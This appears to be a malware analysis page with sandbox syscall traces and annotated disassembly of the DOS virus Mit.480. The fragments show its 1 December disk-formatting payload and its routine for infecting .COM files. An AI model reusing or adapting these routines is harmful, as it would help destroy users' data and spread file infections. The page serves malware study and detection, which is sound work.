Sample viewer

vx.netlux.org/Virus.DOS.Mit.480


Syscalls:

Time Syscall Op Syscall Name
2018-12-17T23:01:43.815713452Z 42 PC: 12a95 | Get date 0x12a95: cmp dh, 0xc
; Disassembly context around PC 0x12a95, the return point of the "Get date"
; call on the row above (DOS returns DH = month, DL = day). The first
; instruction, `cmp dh, 0xc`, is printed on that row: it tests for December.
; The code below is a date-triggered payload: on 1 December it prints a message
; and issues BIOS disk "format track" requests; on any other date it is skipped.
; NOTE(review): the trace table shows only DOS (INT 21h) rows, so the INT 13h
; calls here apparently are not logged by the viewer - confirm before treating
; their absence from a trace as "no disk access".
0x12a98: jne 0x12ac1                 ; month != 12 -> skip the payload
0x12a9a: cmp dl, 1                   ; day of month == 1 ?
0x12a9d: jne 0x12ac1                 ; not the 1st -> skip the payload
0x12a9f: lea dx, word ptr [0x128]    ; DX = offset of the message text
0x12aa3: mov ah, 9                   ; INT 21h AH=09h: print '$'-terminated string at DS:DX
0x12aa5: int 0x21                    ; payload-day trace row: Display string 'MIT Sux! '
0x12aa7: mov ah, 5                   ; INT 13h AH=05h: BIOS "format track" (destroys track contents)
0x12aa9: mov al, 2                   ; AL = 2; meaning for AH=05h varies by BIOS/drive type - TODO confirm
0x12aab: mov ch, 0                   ; cylinder 0
0x12aad: mov dh, 0                   ; head 0
0x12aaf: mov dl, 0x80                ; drive 80h = first hard disk
0x12ab1: int 0x13                    ; ES:BX (format buffer) is not set in this fragment
0x12ab3: mov ah, 6                   ; INT 13h AH=06h: format track and flag sectors bad (XT-era fixed disks)
0x12ab5: int 0x13                    ; DL/CH/DH are not reloaded; presumably still drive 80h, cyl 0, head 0
0x12ab7: mov ah, 5                   ; AH=05h format track again
0x12ab9: mov dl, 0                   ; drive 00h = first floppy drive
0x12abb: int 0x13
0x12abd: mov ah, 0x4c                ; INT 21h AH=4Ch: terminate, AL = return code
0x12abf: int 0x21                    ; payload-day trace reports return code 2 (likely AL from 0x12aa9)
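2018-12-17T23:01:43.81815121Z 53 PC: 12ad3 | Get interrupt vector (Interrupt = '36', i.e. INT 24h, the DOS critical-error handler; the viewer's label 'Set random record number' is the name of INT 21h function 24h, not of this vector)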
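2018-12-17T23:01:43.819261333Z 37 PC: 12ae5 | Set interrupt vector (Interrupt = '36', i.e. INT 24h, the DOS critical-error handler; the viewer's label 'Set random record number' is the name of INT 21h function 24h, not of this vector)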
2018-12-17T23:01:43.82027781Z 26 PC: 12af2 | Set disk transfer address
2018-12-17T23:01:43.825604335Z 78 PC: 12afc | Find first file
2018-12-17T23:01:43.830906144Z 79 PC: 12b22 | Find next file
2018-12-17T23:01:43.832921973Z 79 PC: 12b22 | Find next file
2018-12-17T23:01:43.835866603Z 79 PC: 12b22 | Find next file
2018-12-17T23:01:43.838536738Z 79 PC: 12b22 | Find next file
2018-12-17T23:01:43.84112776Z 79 PC: 12b22 | Find next file
2018-12-17T23:01:43.844152983Z 67 PC: 12b49 | Get or set file attributes
2018-12-17T23:01:43.849960567Z 67 PC: 12b53 | Get or set file attributes
2018-12-17T23:01:43.866031415Z 61 PC: 12b58 | Open file (Filename = 'MANDEL.COM')
2018-12-17T23:01:43.870161652Z 87 PC: 12b61 | Get or set file date and time
2018-12-17T23:01:43.871733743Z 63 PC: 12b73 | Read file or device (Read 480 bytes on handle 5)
2018-12-17T23:01:43.875947976Z 66 PC: 12b84 | Move file pointer
2018-12-17T23:01:43.877314366Z 64 PC: 12b96 | Write file or device (Write 293 bytes on handle 5)
2018-12-17T23:01:43.883584832Z 64 PC: 12ba7 | Write file or device (Write 480 bytes on handle 5)
2018-12-17T23:01:43.892145351Z 66 PC: 12bb8 | Move file pointer
2018-12-17T23:01:43.893394341Z 44 PC: 12bbe | Get time 0x12bbe: mov byte ptr [0x105], dh
; Disassembly context around PC 0x12bbe, the return point of the "Get time"
; call on the row above (DOS returns DH = seconds); the first instruction,
; printed on that row, stores DH at [0x105].
; This stretch writes 0x1E0 (480) bytes from offset 0x100 through INT 21h and
; then starts building a "set file date/time" request. It is a linear
; disassembly, so bytes that execution jumps over are decoded as if they were code.
0x12bc2: call 0x22a46                ; target printed without 16-bit wrap; presumably 0x12a46 (trace rows at PC 12a5a/12a60 follow) - TODO confirm
0x12bc5: mov ah, 0x40                ; INT 21h AH=40h: write to file handle
0x12bc7: lea dx, word ptr [0x100]    ; DS:DX = buffer at offset 0x100
0x12bcb: mov cx, 0x1e0               ; CX = 0x1E0 = 480 bytes (BX, the handle, is set outside this fragment)
0x12bce: int 0x21                    ; trace row at PC 12bd0: Write 480 bytes on handle 5
0x12bd0: jb 0x12c13                  ; carry set = DOS error -> leave via 0x12c13 (not shown)
0x12bd2: cmp ax, 0x1e0               ; AX = bytes actually written
0x12bd5: jne 0x12c13                 ; short write -> same exit
0x12bd7: jmp 0x12be4                 ; jump over the bytes at 0x12bd9-0x12be3
0x12bd9: mov al, 0                   ; two-instruction interrupt handler: AL = 0, then return
0x12bdb: iret                        ; NOTE(review): likely the handler installed for vector 36 (INT 24h), where AL=0 means "ignore" - installed address not shown
0x12bdc: sub byte ptr [di + 0x4d88], cl ; 0x12bdc-0x12be3 sit between iret and the jmp target: likely data, not code
0x12be0: push bp                     ; (part of the same skipped bytes)
0x12be1: add word ptr [bx + 0x11], dx ; (part of the same skipped bytes)
0x12be4: mov ax, 0x5701              ; INT 21h AX=5701h: set file date and time
0x12be7: mov cx, word ptr [0x29c]    ; CX = time word; presumably the value saved by the earlier date/time call - verify
0x12beb: mov dx, word ptr [0x29e]    ; DX = date word; same assumption
0x12bef: and cl, 0xe0                ; clear the low 5 bits of the time (the 2-second field)
0x12bf2: or cl, 0x1f                 ; set them to 31 = "62 seconds", an impossible value; possibly an infection marker - TODO confirm
2018-12-17T23:01:43.897476174Z 25 PC: 12a5a | Get default drive
2018-12-17T23:01:43.898381773Z 14 PC: 12a60 | Set default drive (Drive = 'ˆ')
2018-12-17T23:01:43.899391663Z 64 PC: 12bd0 | Write file or device (Write 480 bytes on handle 5)
2018-12-17T23:01:43.906549275Z 87 PC: 12bf7 | Get or set file date and time
2018-12-17T23:01:43.911096275Z 62 PC: 12bfb | Close file
2018-12-17T23:01:43.918448154Z 26 PC: 12c02 | Set disk transfer address
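2018-12-17T23:01:43.919488758Z 37 PC: 12c12 | Set interrupt vector (Interrupt = '36', i.e. INT 24h, the DOS critical-error handler; the viewer's label 'Set random record number' is the name of INT 21h function 24h, not of this vector)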

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":13966,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:39:39.826559897Z 42 PC: 12a95 | Get date 0x12a95: cmp dh, 0xc
; Disassembly context around PC 0x12a95, the return point of the "Get date"
; call on the row above (DOS returns DH = month, DL = day). The first
; instruction, `cmp dh, 0xc`, is printed on that row: it tests for December.
; The code below is a date-triggered payload: on 1 December it prints a message
; and issues BIOS disk "format track" requests; on any other date it is skipped.
; NOTE(review): the trace table shows only DOS (INT 21h) rows, so the INT 13h
; calls here apparently are not logged by the viewer - confirm before treating
; their absence from a trace as "no disk access".
0x12a98: jne 0x12ac1                 ; month != 12 -> skip the payload
0x12a9a: cmp dl, 1                   ; day of month == 1 ?
0x12a9d: jne 0x12ac1                 ; not the 1st -> skip the payload
0x12a9f: lea dx, word ptr [0x128]    ; DX = offset of the message text
0x12aa3: mov ah, 9                   ; INT 21h AH=09h: print '$'-terminated string at DS:DX
0x12aa5: int 0x21                    ; payload-day trace row: Display string 'MIT Sux! '
0x12aa7: mov ah, 5                   ; INT 13h AH=05h: BIOS "format track" (destroys track contents)
0x12aa9: mov al, 2                   ; AL = 2; meaning for AH=05h varies by BIOS/drive type - TODO confirm
0x12aab: mov ch, 0                   ; cylinder 0
0x12aad: mov dh, 0                   ; head 0
0x12aaf: mov dl, 0x80                ; drive 80h = first hard disk
0x12ab1: int 0x13                    ; ES:BX (format buffer) is not set in this fragment
0x12ab3: mov ah, 6                   ; INT 13h AH=06h: format track and flag sectors bad (XT-era fixed disks)
0x12ab5: int 0x13                    ; DL/CH/DH are not reloaded; presumably still drive 80h, cyl 0, head 0
0x12ab7: mov ah, 5                   ; AH=05h format track again
0x12ab9: mov dl, 0                   ; drive 00h = first floppy drive
0x12abb: int 0x13
0x12abd: mov ah, 0x4c                ; INT 21h AH=4Ch: terminate, AL = return code
0x12abf: int 0x21                    ; payload-day trace reports return code 2 (likely AL from 0x12aa9)
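2018-12-25T12:39:39.830133846Z 53 PC: 12ad3 | Get interrupt vector (Interrupt = '36', i.e. INT 24h, the DOS critical-error handler; the viewer's label 'Set random record number' is the name of INT 21h function 24h, not of this vector)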
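2018-12-25T12:39:39.831878013Z 37 PC: 12ae5 | Set interrupt vector (Interrupt = '36', i.e. INT 24h, the DOS critical-error handler; the viewer's label 'Set random record number' is the name of INT 21h function 24h, not of this vector)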
2018-12-25T12:39:39.833362624Z 26 PC: 12af2 | Set disk transfer address
2018-12-25T12:39:39.834688407Z 78 PC: 12afc | Find first file
2018-12-25T12:39:39.842526482Z 79 PC: 12b22 | Find next file
2018-12-25T12:39:39.847187515Z 79 PC: 12b22 | Find next file (See above)
2018-12-25T12:39:39.856488447Z 79 PC: 12b22 | Find next file (See above)
2018-12-25T12:39:39.863077223Z 79 PC: 12b22 | Find next file (See above)
2018-12-25T12:39:39.86577024Z 79 PC: 12b22 | Find next file (See above)
2018-12-25T12:39:39.868631659Z 67 PC: 12b49 | Get or set file attributes
2018-12-25T12:39:39.875717636Z 67 PC: 12b53 | Get or set file attributes
2018-12-25T12:39:39.893328747Z 61 PC: 12b58 | Open file (Filename = 'MANDEL.COM')
2018-12-25T12:39:39.900776964Z 87 PC: 12b61 | Get or set file date and time
2018-12-25T12:39:39.903303341Z 63 PC: 12b73 | Read file or device (Read 480 bytes on handle 5)
2018-12-25T12:39:39.924166758Z 66 PC: 12b84 | Move file pointer
2018-12-25T12:39:39.926157974Z 64 PC: 12b96 | Write file or device (Write 293 bytes on handle 5)
2018-12-25T12:39:39.935666607Z 64 PC: 12ba7 | Write file or device (Write 480 bytes on handle 5)
2018-12-25T12:39:39.944667064Z 66 PC: 12bb8 | Move file pointer
2018-12-25T12:39:39.946243296Z 44 PC: 12bbe | Get time 0x12bbe: mov byte ptr [0x105], dh
; Disassembly context around PC 0x12bbe, the return point of the "Get time"
; call on the row above (DOS returns DH = seconds); the first instruction,
; printed on that row, stores DH at [0x105].
; This stretch writes 0x1E0 (480) bytes from offset 0x100 through INT 21h and
; then starts building a "set file date/time" request. It is a linear
; disassembly, so bytes that execution jumps over are decoded as if they were code.
0x12bc2: call 0x22a46                ; target printed without 16-bit wrap; presumably 0x12a46 (trace rows at PC 12a5a/12a60 follow) - TODO confirm
0x12bc5: mov ah, 0x40                ; INT 21h AH=40h: write to file handle
0x12bc7: lea dx, word ptr [0x100]    ; DS:DX = buffer at offset 0x100
0x12bcb: mov cx, 0x1e0               ; CX = 0x1E0 = 480 bytes (BX, the handle, is set outside this fragment)
0x12bce: int 0x21                    ; trace row at PC 12bd0: Write 480 bytes on handle 5
0x12bd0: jb 0x12c13                  ; carry set = DOS error -> leave via 0x12c13 (not shown)
0x12bd2: cmp ax, 0x1e0               ; AX = bytes actually written
0x12bd5: jne 0x12c13                 ; short write -> same exit
0x12bd7: jmp 0x12be4                 ; jump over the bytes at 0x12bd9-0x12be3
0x12bd9: mov al, 0                   ; two-instruction interrupt handler: AL = 0, then return
0x12bdb: iret                        ; NOTE(review): likely the handler installed for vector 36 (INT 24h), where AL=0 means "ignore" - installed address not shown
0x12bdc: sub byte ptr [di + 0x4d88], cl ; 0x12bdc-0x12be3 sit between iret and the jmp target: likely data, not code
0x12be0: push bp                     ; (part of the same skipped bytes)
0x12be1: add word ptr [bx + 0x11], dx ; (part of the same skipped bytes)
0x12be4: mov ax, 0x5701              ; INT 21h AX=5701h: set file date and time
0x12be7: mov cx, word ptr [0x29c]    ; CX = time word; presumably the value saved by the earlier date/time call - verify
0x12beb: mov dx, word ptr [0x29e]    ; DX = date word; same assumption
0x12bef: and cl, 0xe0                ; clear the low 5 bits of the time (the 2-second field)
0x12bf2: or cl, 0x1f                 ; set them to 31 = "62 seconds", an impossible value; possibly an infection marker - TODO confirm
2018-12-25T12:39:39.949055924Z 25 PC: 12a5a | Get default drive
2018-12-25T12:39:39.951199396Z 14 PC: 12a60 | Set default drive (Drive = '“')
2018-12-25T12:39:39.952572237Z 64 PC: 12bd0 | Write file or device (Write 480 bytes on handle 5)
2018-12-25T12:39:39.962633269Z 87 PC: 12bf7 | Get or set file date and time
2018-12-25T12:39:39.964983301Z 62 PC: 12bfb | Close file
2018-12-25T12:39:39.973744238Z 26 PC: 12c02 | Set disk transfer address
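2018-12-25T12:39:39.97503537Z 37 PC: 12c12 | Set interrupt vector (Interrupt = '36', i.e. INT 24h, the DOS critical-error handler; the viewer's label 'Set random record number' is the name of INT 21h function 24h, not of this vector)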

{"DateBased":true,"Day":1,"Month":12,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":13966,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:39:39.836668542Z 42 PC: 12a95 | Get date 0x12a95: cmp dh, 0xc
; Disassembly context around PC 0x12a95, the return point of the "Get date"
; call on the row above (DOS returns DH = month, DL = day). The first
; instruction, `cmp dh, 0xc`, is printed on that row: it tests for December.
; The code below is a date-triggered payload: on 1 December it prints a message
; and issues BIOS disk "format track" requests; on any other date it is skipped.
; NOTE(review): the trace table shows only DOS (INT 21h) rows, so the INT 13h
; calls here apparently are not logged by the viewer - confirm before treating
; their absence from a trace as "no disk access".
0x12a98: jne 0x12ac1                 ; month != 12 -> skip the payload
0x12a9a: cmp dl, 1                   ; day of month == 1 ?
0x12a9d: jne 0x12ac1                 ; not the 1st -> skip the payload
0x12a9f: lea dx, word ptr [0x128]    ; DX = offset of the message text
0x12aa3: mov ah, 9                   ; INT 21h AH=09h: print '$'-terminated string at DS:DX
0x12aa5: int 0x21                    ; payload-day trace row: Display string 'MIT Sux! '
0x12aa7: mov ah, 5                   ; INT 13h AH=05h: BIOS "format track" (destroys track contents)
0x12aa9: mov al, 2                   ; AL = 2; meaning for AH=05h varies by BIOS/drive type - TODO confirm
0x12aab: mov ch, 0                   ; cylinder 0
0x12aad: mov dh, 0                   ; head 0
0x12aaf: mov dl, 0x80                ; drive 80h = first hard disk
0x12ab1: int 0x13                    ; ES:BX (format buffer) is not set in this fragment
0x12ab3: mov ah, 6                   ; INT 13h AH=06h: format track and flag sectors bad (XT-era fixed disks)
0x12ab5: int 0x13                    ; DL/CH/DH are not reloaded; presumably still drive 80h, cyl 0, head 0
0x12ab7: mov ah, 5                   ; AH=05h format track again
0x12ab9: mov dl, 0                   ; drive 00h = first floppy drive
0x12abb: int 0x13
0x12abd: mov ah, 0x4c                ; INT 21h AH=4Ch: terminate, AL = return code
0x12abf: int 0x21                    ; payload-day trace reports return code 2 (likely AL from 0x12aa9)
2018-12-25T12:39:39.84041651Z 9 PC: 12aa7 | Display string (String= 'MIT Sux! ')
2018-12-25T12:39:39.846779532Z 76 PC: 12ac1 | Terminate with return code (Return code = '2')

{"DateBased":true,"Day":2,"Month":12,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":13966,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:39:39.926579317Z 42 PC: 12a95 | Get date 0x12a95: cmp dh, 0xc
; Disassembly context around PC 0x12a95, the return point of the "Get date"
; call on the row above (DOS returns DH = month, DL = day). The first
; instruction, `cmp dh, 0xc`, is printed on that row: it tests for December.
; The code below is a date-triggered payload: on 1 December it prints a message
; and issues BIOS disk "format track" requests; on any other date it is skipped.
; NOTE(review): the trace table shows only DOS (INT 21h) rows, so the INT 13h
; calls here apparently are not logged by the viewer - confirm before treating
; their absence from a trace as "no disk access".
0x12a98: jne 0x12ac1                 ; month != 12 -> skip the payload
0x12a9a: cmp dl, 1                   ; day of month == 1 ?
0x12a9d: jne 0x12ac1                 ; not the 1st -> skip the payload
0x12a9f: lea dx, word ptr [0x128]    ; DX = offset of the message text
0x12aa3: mov ah, 9                   ; INT 21h AH=09h: print '$'-terminated string at DS:DX
0x12aa5: int 0x21                    ; payload-day trace row: Display string 'MIT Sux! '
0x12aa7: mov ah, 5                   ; INT 13h AH=05h: BIOS "format track" (destroys track contents)
0x12aa9: mov al, 2                   ; AL = 2; meaning for AH=05h varies by BIOS/drive type - TODO confirm
0x12aab: mov ch, 0                   ; cylinder 0
0x12aad: mov dh, 0                   ; head 0
0x12aaf: mov dl, 0x80                ; drive 80h = first hard disk
0x12ab1: int 0x13                    ; ES:BX (format buffer) is not set in this fragment
0x12ab3: mov ah, 6                   ; INT 13h AH=06h: format track and flag sectors bad (XT-era fixed disks)
0x12ab5: int 0x13                    ; DL/CH/DH are not reloaded; presumably still drive 80h, cyl 0, head 0
0x12ab7: mov ah, 5                   ; AH=05h format track again
0x12ab9: mov dl, 0                   ; drive 00h = first floppy drive
0x12abb: int 0x13
0x12abd: mov ah, 0x4c                ; INT 21h AH=4Ch: terminate, AL = return code
0x12abf: int 0x21                    ; payload-day trace reports return code 2 (likely AL from 0x12aa9)
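2018-12-25T12:39:39.929626521Z 53 PC: 12ad3 | Get interrupt vector (Interrupt = '36', i.e. INT 24h, the DOS critical-error handler; the viewer's label 'Set random record number' is the name of INT 21h function 24h, not of this vector)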
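2018-12-25T12:39:39.930971603Z 37 PC: 12ae5 | Set interrupt vector (Interrupt = '36', i.e. INT 24h, the DOS critical-error handler; the viewer's label 'Set random record number' is the name of INT 21h function 24h, not of this vector)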
2018-12-25T12:39:39.932256722Z 26 PC: 12af2 | Set disk transfer address
2018-12-25T12:39:39.934367901Z 78 PC: 12afc | Find first file
2018-12-25T12:39:39.941847459Z 79 PC: 12b22 | Find next file
2018-12-25T12:39:39.9444341Z 79 PC: 12b22 | Find next file (See above)
2018-12-25T12:39:39.947016753Z 79 PC: 12b22 | Find next file (See above)
2018-12-25T12:39:39.950362562Z 79 PC: 12b22 | Find next file (See above)
2018-12-25T12:39:39.95324661Z 79 PC: 12b22 | Find next file (See above)
2018-12-25T12:39:39.956365516Z 67 PC: 12b49 | Get or set file attributes
2018-12-25T12:39:39.964070474Z 67 PC: 12b53 | Get or set file attributes
2018-12-25T12:39:39.98249685Z 61 PC: 12b58 | Open file (Filename = 'MANDEL.COM')
2018-12-25T12:39:39.99001521Z 87 PC: 12b61 | Get or set file date and time
2018-12-25T12:39:39.992166396Z 63 PC: 12b73 | Read file or device (Read 480 bytes on handle 5)
2018-12-25T12:39:39.999222414Z 66 PC: 12b84 | Move file pointer
2018-12-25T12:39:40.000811706Z 64 PC: 12b96 | Write file or device (Write 293 bytes on handle 5)
2018-12-25T12:39:40.01068177Z 64 PC: 12ba7 | Write file or device (Write 480 bytes on handle 5)
2018-12-25T12:39:40.020533774Z 66 PC: 12bb8 | Move file pointer
2018-12-25T12:39:40.022366632Z 44 PC: 12bbe | Get time 0x12bbe: mov byte ptr [0x105], dh
; Disassembly context around PC 0x12bbe, the return point of the "Get time"
; call on the row above (DOS returns DH = seconds); the first instruction,
; printed on that row, stores DH at [0x105].
; This stretch writes 0x1E0 (480) bytes from offset 0x100 through INT 21h and
; then starts building a "set file date/time" request. It is a linear
; disassembly, so bytes that execution jumps over are decoded as if they were code.
0x12bc2: call 0x22a46                ; target printed without 16-bit wrap; presumably 0x12a46 (trace rows at PC 12a5a/12a60 follow) - TODO confirm
0x12bc5: mov ah, 0x40                ; INT 21h AH=40h: write to file handle
0x12bc7: lea dx, word ptr [0x100]    ; DS:DX = buffer at offset 0x100
0x12bcb: mov cx, 0x1e0               ; CX = 0x1E0 = 480 bytes (BX, the handle, is set outside this fragment)
0x12bce: int 0x21                    ; trace row at PC 12bd0: Write 480 bytes on handle 5
0x12bd0: jb 0x12c13                  ; carry set = DOS error -> leave via 0x12c13 (not shown)
0x12bd2: cmp ax, 0x1e0               ; AX = bytes actually written
0x12bd5: jne 0x12c13                 ; short write -> same exit
0x12bd7: jmp 0x12be4                 ; jump over the bytes at 0x12bd9-0x12be3
0x12bd9: mov al, 0                   ; two-instruction interrupt handler: AL = 0, then return
0x12bdb: iret                        ; NOTE(review): likely the handler installed for vector 36 (INT 24h), where AL=0 means "ignore" - installed address not shown
0x12bdc: sub byte ptr [di + 0x4d88], cl ; 0x12bdc-0x12be3 sit between iret and the jmp target: likely data, not code
0x12be0: push bp                     ; (part of the same skipped bytes)
0x12be1: add word ptr [bx + 0x11], dx ; (part of the same skipped bytes)
0x12be4: mov ax, 0x5701              ; INT 21h AX=5701h: set file date and time
0x12be7: mov cx, word ptr [0x29c]    ; CX = time word; presumably the value saved by the earlier date/time call - verify
0x12beb: mov dx, word ptr [0x29e]    ; DX = date word; same assumption
0x12bef: and cl, 0xe0                ; clear the low 5 bits of the time (the 2-second field)
0x12bf2: or cl, 0x1f                 ; set them to 31 = "62 seconds", an impossible value; possibly an infection marker - TODO confirm
2018-12-25T12:39:40.025871868Z 25 PC: 12a5a | Get default drive
2018-12-25T12:39:40.027138095Z 14 PC: 12a60 | Set default drive (Drive = '“')
2018-12-25T12:39:40.028442884Z 64 PC: 12bd0 | Write file or device (Write 480 bytes on handle 5)
2018-12-25T12:39:40.036095439Z 87 PC: 12bf7 | Get or set file date and time
2018-12-25T12:39:40.038555274Z 62 PC: 12bfb | Close file
2018-12-25T12:39:40.047643239Z 26 PC: 12c02 | Set disk transfer address
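2018-12-25T12:39:40.050000003Z 37 PC: 12c12 | Set interrupt vector (Interrupt = '36', i.e. INT 24h, the DOS critical-error handler; the viewer's label 'Set random record number' is the name of INT 21h function 24h, not of this vector)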